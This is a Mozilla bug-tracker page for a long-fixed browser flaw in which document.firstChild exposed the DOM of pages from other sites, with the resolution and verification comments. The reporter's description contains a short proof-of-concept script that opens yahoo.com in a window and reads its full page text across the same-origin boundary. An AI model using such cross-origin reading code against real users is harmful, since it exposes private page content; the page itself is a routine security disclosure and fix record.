document.firstChild vulnerability

VERIFIED FIXED in M14

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
18 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
document.firstChild exposes the DOM of arbitrary document which at least allows
reading documents.
The code is:
---------------------------------------------------------------------------
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}
a=window.open("http://www.yahoo.com","victim");
function g()
{
document.forms[0].elements[0].value=f(a.document.firstChild);
}
setTimeout("g()",10000);
---------------------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M14
(Assignee)

Comment 1

19 years ago
This is fixed with my Friday night checkin of all.js.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Updated

19 years ago
QA Contact: junruh → dshea

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 2

19 years ago
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...

Comment 3

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.